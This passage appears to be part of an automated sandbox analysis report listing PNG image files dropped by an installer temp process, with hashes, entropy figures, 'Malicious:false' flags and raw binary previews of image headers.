                                                                                                                                                                                                                                                          SHA-256:F9050D57ED7DDF92CD1B92505BEB33A606EA90682AE918DF2464C0F4ECC8CBEA
                                                                                                                                                                                                                                                          SHA-512:646C7DEF65B4921CE55246D408348E10628B55FB4D5F920EE69CEC88F3F3C38BB1157C749CA4F0B13710AA431DFA4229E4D67380AF0A0FBF78A9958ACB739464
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......P...... %....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 1122 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):36574
                                                                                                                                                                                                                                                          Entropy (8bit):7.983280552060311
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:3WN9F6pKVwko1aCYqIfw7dVCOyauFqRZd96/UCfD0J1RGz3/:3WDwc6kHYI47wqRzc/bfDG1RGj/
                                                                                                                                                                                                                                                          MD5:6013CCDC5004442BD8EB1EAEE1A2FDFE
                                                                                                                                                                                                                                                          SHA1:7447A346E5E2002E4EF6C56E149EB140ECC5F192
                                                                                                                                                                                                                                                          SHA-256:065857BDAEC7F2E73BA3F7B81D627B94794B67E35D62168F439200FC840412A5
                                                                                                                                                                                                                                                          SHA-512:2047C8F6BAFCC06124A2BD3776475B89C2470090DEB186AF88787E0AFA2DDC0462C70FEBF58ECED3F192E5DC918BE37F4A17EAAA63D337C8A176099F818F9A25
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...b...<.....-.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:557A66613F9D11E2B86C971723AA9104" xmpMM:DocumentID="xmp.did:557A66623F9D11E2B86C971723AA9104"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:557A665F3F9D11E2B86C971723AA9104" stRef:documentID="xmp.did:557A66603F9D11E2B86C971723AA9104"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>-2.....RIDATx..].x...~.eM...^....$.@.e.({..B...Z...~J[Z.-PJ[.t0...E.3.;v......=.c;.-[..$.........s.......'...7.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5873
                                                                                                                                                                                                                                                          Entropy (8bit):7.9422746739510455
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:LSDZ/I09Da01l+gmkyTt6Hk8nTbCCivsM0hVEz9EEWJcLWmu9H3s5cVQOVplQG:LSDS0tKg9E05TdMiEz9IJcVOVQG
                                                                                                                                                                                                                                                          MD5:08696DFA1637279FCD315A0D2B13EA6E
                                                                                                                                                                                                                                                          SHA1:9579D2CC5852F05288E2205F060F6C18F5619C39
                                                                                                                                                                                                                                                          SHA-256:7C9CBFC634C58F761DFE138DD770C533B5DDDCF222FDE0B3BACFBB76F9A4CD9F
                                                                                                                                                                                                                                                          SHA-512:F38BDF328BE3A4D7003A9216BDF2A9FAD1E53B130DAE37CA2BFC2CA36A497392A03950B137A1363AA25523068A38C87D6B19D5EFFAF0D5E421CE346140B9B444
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...:...<.....@.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):6513
                                                                                                                                                                                                                                                          Entropy (8bit):7.938370771306964
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:LSDZ/I09Da01l+gmkyTt6Hk8nTQ27DriW08tOW633IfYjzfxKoKg49BM+Uf9C4jc:LSDS0tKg9E05TQ2jX08MQgHx6Sxm3Cg7
                                                                                                                                                                                                                                                          MD5:538614FCC5E9A342D74CFB01246E3755
                                                                                                                                                                                                                                                          SHA1:3496DD97D840823F928213E7E69BB8386EA057DC
                                                                                                                                                                                                                                                          SHA-256:3524B51003AC153E7A40775C3955AA8E3F60AE99F99E514DB60A4BED628C16BC
                                                                                                                                                                                                                                                          SHA-512:A2689D78B11B7C48BABAD5FC97672F6173DFF0DF3C082F6403581FFA45AE7E123BAA93B46DC3495CAD42328959E0EEBA68C70F35E371D175A5E406A9BAFED576
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...:...<.....@.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5507
                                                                                                                                                                                                                                                          Entropy (8bit):7.929272432606936
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:LSDZ/I09Da01l+gmkyTt6Hk8nTlzb1sV3wLir9SfPUZ+IK0UAPcWNSB:LSDS0tKg9E05TBbUA+9CGK0xy
                                                                                                                                                                                                                                                          MD5:581AD143944C6620786FE8E8FC09EE1D
                                                                                                                                                                                                                                                          SHA1:E933A895E544CC90F45F3F93E0F28545A780CCBC
                                                                                                                                                                                                                                                          SHA-256:1855774FD5C9C275F57970DDAD469EB71B9841D8C3440128F9351C960A8F0B4E
                                                                                                                                                                                                                                                          SHA-512:072AB07C04E55FE3D1033FFB491EB6F180E40E8691003E46A9EB6CB37857423A2C4704C8683C4DEDFC89D79AB5BE61D2BAA8069245861EBD4865B1C67EBF42E8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...:...<.....@.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):20030
                                                                                                                                                                                                                                                          Entropy (8bit):7.985863672702684
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:KJXE050lAI9uOflF5XFBw+q7hYwPXsUoRGf0wp4vF:K350f95fl1uD7/XuC4vF
                                                                                                                                                                                                                                                          MD5:E01B942B6936DF2AF64EE809086A5334
                                                                                                                                                                                                                                                          SHA1:6601FE8901F8F131CF47352896B01C8DCFD4C963
                                                                                                                                                                                                                                                          SHA-256:E5FEAB5FF923032A51C09F3D61DB2C4AE052CEA6691F034F397207EACC3C2283
                                                                                                                                                                                                                                                          SHA-512:8B21E8B99218F8A0646A418BF3B184A7F8BA1A8061A60383E1EF0BECF85CD07DD68478AD8225A17ED1458DCCC49585B77FF77407F016D95FE57FAD3E8C305BE9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...Z...6.......au....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 66 x 67, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):7889
                                                                                                                                                                                                                                                          Entropy (8bit):7.956855049886426
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:fSDS0tKg9E05TVL0ZW4wNoOfMK98rfXQoEad7vgE:KJXE05105wNl9iPQs7v/
                                                                                                                                                                                                                                                          MD5:5F738BDCCB17BABFD837386300BEF102
                                                                                                                                                                                                                                                          SHA1:41F26EC0399CE58E1550A34C967A876A5F2FC8FB
                                                                                                                                                                                                                                                          SHA-256:07C6155BB34D9BEBF03ECAAD535709B444D156A375F42FED15B26F6414FF63D3
                                                                                                                                                                                                                                                          SHA-512:672E9D39AC2538D2F5CD082BD364E5C554AB0FE0A05A2BBFD4172ABDAA36AB1BCD86CCAACBBE333B85AD3905E25B5E0F0D8355E6290E8340BBE0165FC94C5E57
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...B...C....._.......pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):6329
                                                                                                                                                                                                                                                          Entropy (8bit):7.947037633028336
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:LSDS0tKg9E05T58Vi5CX4vwjS9b+2xv+RfO17:+JXE05GIg4ojub+2xvt7
                                                                                                                                                                                                                                                          MD5:03AF571726FE2C2A27BFACE13DE342A6
                                                                                                                                                                                                                                                          SHA1:A350EC8147AE0AD79E8155E7FF62772C9A0AB339
                                                                                                                                                                                                                                                          SHA-256:93C34A8EB0A686EDD27DCEFDAD5AFDDB2005FE27E09EE9880475E35F09A68BCA
                                                                                                                                                                                                                                                          SHA-512:29B0DD9B86A559710262CEA72EF08DDDB9B91621C1BFC21A8E2B5EDDEE7D0EBC73A778B2AF1198903F5EC3EC59891E3EA0B991D3D48FD49938FA047706ABEBBB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...:...<.....@.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5798
                                                                                                                                                                                                                                                          Entropy (8bit):7.935696994639288
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:LSDZ/I09Da01l+gmkyTt6Hk8nT4+KjhO/UW3j12FlHdjuxgXZLqKhiz:LSDS0tKg9E05TEjE8aoxdqqXZdEz
                                                                                                                                                                                                                                                          MD5:5503FA64C9D05F3025834D93A81AF764
                                                                                                                                                                                                                                                          SHA1:CD2ABB0DD317BAAB5ED12488B7EF0EB76795F95D
                                                                                                                                                                                                                                                          SHA-256:F4EE63F12CE2753CF71A160F5D7772E998CF5B6DBD4BB27502AE43789D9DA822
                                                                                                                                                                                                                                                          SHA-512:AB205307CEA14D14FA7CCE024244FCF5AAE6DA6F7825058A3061CB88DCDE2579DBB6670516559792B631B2A39E756BF4E81ED63C16C205AFDEFCFCBD42F07245
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...:...<.....@.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5507
                                                                                                                                                                                                                                                          Entropy (8bit):7.929272432606936
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:LSDZ/I09Da01l+gmkyTt6Hk8nTlzb1sV3wLir9SfPUZ+IK0UAPcWNSB:LSDS0tKg9E05TBbUA+9CGK0xy
                                                                                                                                                                                                                                                          MD5:581AD143944C6620786FE8E8FC09EE1D
                                                                                                                                                                                                                                                          SHA1:E933A895E544CC90F45F3F93E0F28545A780CCBC
                                                                                                                                                                                                                                                          SHA-256:1855774FD5C9C275F57970DDAD469EB71B9841D8C3440128F9351C960A8F0B4E
                                                                                                                                                                                                                                                          SHA-512:072AB07C04E55FE3D1033FFB491EB6F180E40E8691003E46A9EB6CB37857423A2C4704C8683C4DEDFC89D79AB5BE61D2BAA8069245861EBD4865B1C67EBF42E8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...:...<.....@.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):6329
                                                                                                                                                                                                                                                          Entropy (8bit):7.947037633028336
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:LSDS0tKg9E05T58Vi5CX4vwjS9b+2xv+RfO17:+JXE05GIg4ojub+2xvt7
                                                                                                                                                                                                                                                          MD5:03AF571726FE2C2A27BFACE13DE342A6
                                                                                                                                                                                                                                                          SHA1:A350EC8147AE0AD79E8155E7FF62772C9A0AB339
                                                                                                                                                                                                                                                          SHA-256:93C34A8EB0A686EDD27DCEFDAD5AFDDB2005FE27E09EE9880475E35F09A68BCA
                                                                                                                                                                                                                                                          SHA-512:29B0DD9B86A559710262CEA72EF08DDDB9B91621C1BFC21A8E2B5EDDEE7D0EBC73A778B2AF1198903F5EC3EC59891E3EA0B991D3D48FD49938FA047706ABEBBB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...:...<.....@.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 66 x 67, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):7889
                                                                                                                                                                                                                                                          Entropy (8bit):7.956855049886426
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:fSDS0tKg9E05TVL0ZW4wNoOfMK98rfXQoEad7vgE:KJXE05105wNl9iPQs7v/
                                                                                                                                                                                                                                                          MD5:5F738BDCCB17BABFD837386300BEF102
                                                                                                                                                                                                                                                          SHA1:41F26EC0399CE58E1550A34C967A876A5F2FC8FB
                                                                                                                                                                                                                                                          SHA-256:07C6155BB34D9BEBF03ECAAD535709B444D156A375F42FED15B26F6414FF63D3
                                                                                                                                                                                                                                                          SHA-512:672E9D39AC2538D2F5CD082BD364E5C554AB0FE0A05A2BBFD4172ABDAA36AB1BCD86CCAACBBE333B85AD3905E25B5E0F0D8355E6290E8340BBE0165FC94C5E57
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...B...C....._.......pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
